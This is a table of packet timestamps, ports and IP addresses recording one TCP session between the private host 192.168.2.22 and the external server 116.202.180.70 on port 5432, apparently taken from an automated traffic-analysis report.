Jul 3, 2024 02:22:32.143805027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.143814087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.143815041 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.143826008 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.143841028 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.155934095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.155966043 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.155996084 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.155998945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156002998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156032085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156148911 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156158924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156173944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156183004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156193018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156194925 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156204939 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156218052 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156250000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156265020 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156274080 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156284094 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156284094 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156292915 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156292915 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156302929 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156306982 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156312943 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156330109 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156341076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156343937 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156353951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156362057 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156372070 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156379938 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156383038 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156387091 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156402111 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156410933 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156440973 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156470060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156476021 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156477928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156500101 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156510115 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156518936 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156528950 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156538010 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156553984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156554937 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156563044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.156563044 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156579971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156586885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.156805992 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.188716888 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188735962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188745022 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188754082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188762903 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.188764095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188774109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188775063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.188785076 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188790083 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.188797951 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.188817978 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.188921928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188931942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188941002 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188951015 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.188963890 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.188975096 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.188982964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189019918 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189063072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189071894 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189105034 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189116955 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189152002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189181089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189191103 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189218998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189341068 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189349890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189359903 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189371109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189382076 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189390898 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189395905 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189400911 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189405918 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189423084 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189430952 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189466953 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189477921 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189487934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189497948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189502001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189507961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189510107 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189523935 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189532042 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189620972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189632893 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189641953 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189651966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189651966 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189663887 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189676046 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189716101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189728022 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189738035 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189745903 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.189752102 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189763069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189776897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.189776897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.204565048 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204577923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204588890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204644918 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.204672098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204689026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204699993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204710007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204720974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204721928 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.204731941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204742908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.204744101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204756021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204762936 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.204767942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204777956 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.204780102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204792023 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.204797983 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.204818010 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.205343008 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218080044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218092918 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218102932 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218133926 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218146086 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218229055 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218239069 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218247890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218256950 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218267918 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218269110 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218280077 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218285084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218301058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218307972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218311071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218319893 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218322992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218328953 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218333006 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218342066 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218352079 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218364000 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218369007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.218410015 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.218621969 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227396011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227428913 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227438927 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227466106 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227490902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227500916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227509975 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227519035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227519035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227520943 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227545023 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227602005 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227612972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227622032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227632999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227638960 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227642059 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227649927 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227663994 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227673054 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227683067 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227695942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.227719069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.227936983 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.234436989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.234447956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.234457016 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.234484911 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.234496117 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.234688044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.234698057 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.234707117 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.234721899 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.234733105 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.234744072 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.234744072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.234754086 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.234778881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247004032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247035027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247045040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247066975 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247077942 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247174025 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247183084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247191906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247208118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247217894 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247219086 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247229099 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247231960 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247237921 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247247934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247256994 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247257948 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247267008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247271061 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247278929 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247288942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247292995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247301102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247306108 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247311115 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247322083 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247335911 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247361898 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247374058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247383118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247395039 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247397900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247409105 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247410059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247417927 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247427940 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247433901 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247438908 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247448921 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247457027 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247467995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247473001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247478008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.247502089 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.247787952 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279509068 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279566050 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279577017 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279586077 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279597044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279597044 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279608011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279613972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279618979 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279627085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279640913 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279649973 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279685974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279695034 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279731035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279748917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279797077 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279800892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279809952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279824972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279834032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279836893 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279843092 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279861927 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279877901 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279927015 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279962063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.279983044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.279992104 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280016899 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280059099 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280070066 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280080080 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280091047 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280100107 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280112982 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280124903 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280149937 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280160904 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280170918 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280179024 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280188084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280195951 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280195951 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280196905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280208111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280215025 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280217886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280225992 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280236959 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280246973 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280328989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280339003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280348063 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280356884 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280366898 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280369997 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280375004 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280380011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280390024 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280400991 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280412912 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280430079 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280440092 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280452967 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.280469894 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280491114 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.280518055 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.295164108 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.295175076 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.295183897 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.295209885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.295216084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.295217037 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.295226097 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.295243025 CEST	5432	49169	116.202.180.70	192.168.2.22
